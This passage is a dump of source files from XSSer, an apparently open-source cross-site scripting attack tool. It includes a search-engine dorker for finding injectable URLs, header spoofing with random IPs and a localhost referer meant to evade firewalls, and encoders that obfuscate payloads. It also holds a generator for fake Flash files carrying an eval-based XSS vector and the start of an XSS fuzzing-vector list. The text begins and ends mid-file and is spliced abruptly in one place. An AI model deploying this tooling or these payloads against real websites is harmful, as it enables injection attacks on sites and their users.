m['content-type'] = (self.handle.getinfo(pycurl.CONTENT_TYPE) or '').strip(';') 452 | except: 453 | m['content-type'] = str("text/html; charset=UTF-8") 454 | m['cookielist'] = str(self.handle.getinfo(pycurl.INFO_COOKIELIST)) 455 | #m['content-length-download'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_DOWNLOAD)) 456 | #m['content-length-upload'] = str(self.handle.getinfo(pycurl.CONTENT_LENGTH_UPLOAD)) 457 | #m['encoding'] = str(self.handle.getinfo(pycurl.ENCODING)) 458 | return m 459 | 460 | @classmethod 461 | def print_options(cls): 462 | """ 463 | Print selected options. 
464 | """ 465 | print("\nCookie:", cls.cookie) 466 | print("User Agent:", cls.agent) 467 | print("Referer:", cls.referer) 468 | print("Extra Headers:", cls.headers) 469 | if cls.xforw == True: 470 | print("X-Forwarded-For:", "Random IP") 471 | else: 472 | print("X-Forwarded-For:", cls.xforw) 473 | if cls.xclient == True: 474 | print("X-Client-IP:", "Random IP") 475 | else: 476 | print("X-Client-IP:", cls.xclient) 477 | print("Authentication Type:", cls.atype) 478 | print("Authentication Credentials:", cls.acred) 479 | if cls.ignoreproxy == True: 480 | print("Proxy:", "Ignoring system default HTTP proxy") 481 | else: 482 | print("Proxy:", cls.proxy) 483 | print("Timeout:", cls.timeout) 484 | if cls.tcp_nodelay == True: 485 | print("Delaying:", "TCP_NODELAY activate") 486 | else: 487 | print("Delaying:", cls.delay, "seconds") 488 | if cls.followred == True: 489 | print("Follow 302 code:", "active") 490 | if cls.fli: 491 | print("Limit to follow:", cls.fli) 492 | else: 493 | print("Delaying:", cls.delay, "seconds") 494 | print("Retries:", cls.retries, "\n") 495 | 496 | def answered(self, check): 497 | """ 498 | Check for occurence of a string in the payload from 499 | the latest operation. 500 | """ 501 | return self.payload.find(check) >= 0 502 | 503 | def close(self): 504 | """ 505 | Close the curl handle. 
506 | """ 507 | self.handle.close() 508 | self.header.close() 509 | self._closed = True 510 | 511 | def __del__(self): 512 | if not self._closed: 513 | self.close() 514 | -------------------------------------------------------------------------------- /core/dork.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2020 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | ........ 
22 | 23 | List of search engines: https://en.wikipedia.org/wiki/List_of_search_engines 24 | 25 | Currently supported: duck(default), startpage, yahoo, bing 26 | 27 | """ 28 | import urllib.request, urllib.error, urllib.parse, traceback, re, random 29 | urllib.request.socket.setdefaulttimeout(5.0) 30 | 31 | DEBUG = 0 32 | 33 | class Dorker(object): 34 | def __init__(self, engine='duck'): 35 | self._engine = engine 36 | self.search_engines = [] # available dorking search engines 37 | self.search_engines.append('duck') 38 | self.search_engines.append('startpage') 39 | self.search_engines.append('yahoo') 40 | self.search_engines.append('bing') 41 | self.agents = [] # user-agents 42 | try: 43 | f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents 44 | except: 45 | f = open("fuzzing/user-agents.txt").readlines() # set path for user-agents when testing 46 | for line in f: 47 | self.agents.append(line) 48 | 49 | def dork(self, search): 50 | """ 51 | Perform a search and return links. 
52 | """ 53 | if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019 54 | search_url = 'https://www.bing.com/search?q="' + str(search) + '"' 55 | print("\nSearching query:", urllib.parse.unquote(search_url)) 56 | elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019 57 | search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"' 58 | print("\nSearching query:", urllib.parse.unquote(search_url)) 59 | elif self._engine == 'duck': # works at 26-08-2019 60 | search_url = 'https://duckduckgo.com/html/' 61 | q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results 62 | query_string = { 'q':q } 63 | print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]") 64 | elif self._engine == 'startpage': # works at 26-08-2019 65 | search_url = 'https://www.startpage.com/do/asearch' 66 | q = 'url:"' + str(search) + '"' # set query to search literally on results 67 | query_string = { 'cmd':'process_search', 'query':q } 68 | print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]") 69 | else: 70 | print("\n[Error] This search engine is not supported!\n") 71 | print('-'*25) 72 | print("\n[Info] Use one from this list:\n") 73 | for e in self.search_engines: 74 | print("+ "+e) 75 | print("\n ex: xsser -d 'profile.asp?num=' --De 'duck'") 76 | print(" ex: xsser -l --De 'startpage'") 77 | print("\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n"); return # bail out: 'search_url' is undefined for unsupported engines 78 | try: 79 | self.search_url = search_url 80 | user_agent = random.choice(self.agents).strip() # set random user-agent 81 | referer = '127.0.0.1' # set referer to localhost / WAF black magic! 
82 | headers = {'User-Agent' : user_agent, 'Referer' : referer} 83 | if self._engine == 'bing' or self._engine == 'yahoo': # using GET 84 | req = urllib.request.Request(search_url, None, headers) 85 | elif self._engine == 'duck' or self._engine == 'startpage': # using POST 86 | data = urllib.parse.urlencode(query_string).encode('utf-8') # POST body must be bytes in Python 3 87 | req = urllib.request.Request(search_url, data, headers) 88 | html_data = urllib.request.urlopen(req).read().decode('utf8') 89 | print("\n[Info] Retrieving requested info...\n") 90 | except urllib.error.URLError as e: 91 | if DEBUG: 92 | traceback.print_exc() 93 | print("\n[Error] Cannot connect!") 94 | print("\n" + "-"*50) 95 | return 96 | if self._engine == 'bing': 97 | regex = '

8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import urllib.request, urllib.parse, urllib.error 23 | 24 | class EncoderDecoder(object): 25 | """ 26 | Class to help encoding and decoding strings with different hashing or 27 | encoding algorithms. 28 | """ 29 | # encdec functions: 30 | def __init__(self): 31 | self.encmap = { "Str" : lambda x : self._fromCharCodeEncode(x), 32 | "Hex" : lambda x : self._hexEncode(x), 33 | "Hes" : lambda x : self._hexSemiEncode(x), 34 | "Une" : lambda x : self._unEscape(x), 35 | "Dec" : lambda x : self._decEncode(x), 36 | "Mix" : lambda x : self._unEscape(self._fromCharCodeEncode(x)) 37 | } 38 | 39 | def _fromCharCodeEncode(self, string): 40 | """ 41 | Encode to comma-separated char codes (for JS String.fromCharCode()). 42 | """ 43 | encoded='' 44 | for char in string: 45 | encoded=encoded+","+str(ord(char)) 46 | return encoded[1:] 47 | 48 | def _hexEncode(self, string): 49 | """ 50 | Encode to hex. 51 | """ 52 | encoded='' 53 | for char in string: 54 | encoded=encoded+"%"+hex(ord(char))[2:] 55 | return encoded 56 | 57 | def _hexSemiEncode(self, string): 58 | """ 59 | Encode to semi hex. 60 | """ 61 | encoded='' 62 | for char in string: 63 | encoded=encoded+"&#x"+hex(ord(char))[2:]+";" 64 | return encoded 65 | 66 | def _decEncode(self, string): 67 | """ 68 | Encode to decimal. 
69 | """ 70 | encoded='' 71 | for char in string: 72 | encoded=encoded+"&#"+str(ord(char)) 73 | return encoded 74 | 75 | def _unEscape(self, string): 76 | """ 77 | Percent-encode string (for decoding with JS unescape()). 78 | """ 79 | encoded='' 80 | for char in string: 81 | encoded=encoded+urllib.parse.quote(char) 82 | return encoded 83 | 84 | def _ipDwordEncode(self, string): 85 | """ 86 | Encode to dword. 87 | """ 88 | encoded='' 89 | tblIP = string.split('.') 90 | # In the case it's not an IP 91 | if len(tblIP)!=4: 92 | return 0 93 | for number in tblIP: 94 | tmp=hex(int(number))[2:] 95 | if len(tmp)==1: 96 | tmp='0' +tmp 97 | encoded=encoded+tmp 98 | return int(encoded,16) 99 | 100 | def _ipOctalEncode(self, string): 101 | """ 102 | Encode to octal. 103 | """ 104 | encoded='' 105 | tblIP = string.split('.') 106 | # In the case it's not an IP 107 | if len(tblIP)!=4: 108 | return 0 109 | octIP = ["%04o" % int(s) for s in tblIP] # zero-padded octal; Python 3's oct() adds an '0o' prefix 110 | return ".".join(octIP) 111 | 112 | if __name__ == "__main__": 113 | encdec = EncoderDecoder() 114 | print(encdec._ipOctalEncode("127.0.0.1")) 115 | -------------------------------------------------------------------------------- /core/flashxss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2019 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. See the GNU General Public License for more 16 | details. 
17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | import os 23 | 24 | class FlashInjections(object): 25 | 26 | def __init__(self, payload =''): 27 | self._payload = payload 28 | 29 | def flash_xss(self, filename, payload): 30 | """ 31 | Create -fake- flash movie (.swf) with XSS code injected. 32 | """ 33 | root, ext = os.path.splitext(filename) 34 | if ext.lower() in [".swf"]: 35 | f = open(filename, 'w') # text mode: the payload is a str 36 | user_payload = payload 37 | if not user_payload: 38 | user_payload = 'a="get";b="URL";c="javascript:";d="alert(\'XSS\');void(0);";eval(a+b)(c+d);' 39 | if ext.lower() == ".swf": 40 | content = user_payload 41 | f.write(content) 42 | f.close() 43 | flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n " + root + ext + "\n" 44 | else: 45 | flash_results = "\n[Error] Supported extensions = .swf\n" 46 | return flash_results 47 | 48 | if __name__ == '__main__': 49 | flash_xss_injection = FlashInjections('') 50 | print(flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "")) 51 | -------------------------------------------------------------------------------- /core/fuzzing/DCP.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*-" 3 | # vim: set expandtab tabstop=4 shiftwidth=4: 4 | """ 5 | This file is part of the XSSer project, https://xsser.03c8.net 6 | 7 | Copyright (c) 2010/2019 | psy 8 | 9 | xsser is free software; you can redistribute it and/or modify it under 10 | the terms of the GNU General Public License as published by the Free 11 | Software Foundation version 3 of the License. 12 | 13 | xsser is distributed in the hope that it will be useful, but WITHOUT ANY 14 | WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS 15 | FOR A PARTICULAR PURPOSE. 
See the GNU General Public License for more 16 | details. 17 | 18 | You should have received a copy of the GNU General Public License along 19 | with xsser; if not, write to the Free Software Foundation, Inc., 51 20 | Franklin St, Fifth Floor, Boston, MA 02110-1301 USA 21 | """ 22 | ## This file contains different XSS fuzzing vectors. 23 | ## If you have new ones, please email them to [epsylon@riseup.net] 24 | ## Happy Cross Hacking! ;) 25 | 26 | DCPvectors = [ 27 | { 'payload' : """[B64]""", 28 | 'browser' : """[Data Control Protocol Injection]"""}, 29 | { 'payload' : """
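The encoding helpers in core/encdec.py above can be exercised on their own. The following standalone sketch (not part of the repository; function names are illustrative) mirrors the "Str", "Hex", "Hes" and "Dec" transforms from the `encmap` table, producing the same output formats:

```python
# Illustrative re-implementation of four EncoderDecoder transforms
# from core/encdec.py (hypothetical helper names, same output format).

def from_char_code(s):
    # "Str": comma-separated decimal char codes, usable with JS String.fromCharCode()
    return ",".join(str(ord(c)) for c in s)

def hex_encode(s):
    # "Hex": URL-style %XX hexadecimal escapes
    return "".join("%" + format(ord(c), "x") for c in s)

def hex_semi_encode(s):
    # "Hes": HTML hexadecimal character references
    return "".join("&#x" + format(ord(c), "x") + ";" for c in s)

def dec_encode(s):
    # "Dec": HTML decimal character references (no trailing ';', as in the source)
    return "".join("&#" + str(ord(c)) for c in s)

if __name__ == "__main__":
    print(from_char_code("XSS"))   # 88,83,83
    print(hex_encode("XSS"))       # %58%53%53
    print(hex_semi_encode("XSS"))  # &#x58;&#x53;&#x53;
    print(dec_encode("XSS"))       # &#88&#83&#83
```

These alternate representations of the same probe string are what lets the fuzzer bypass naive input filters that only match the literal payload.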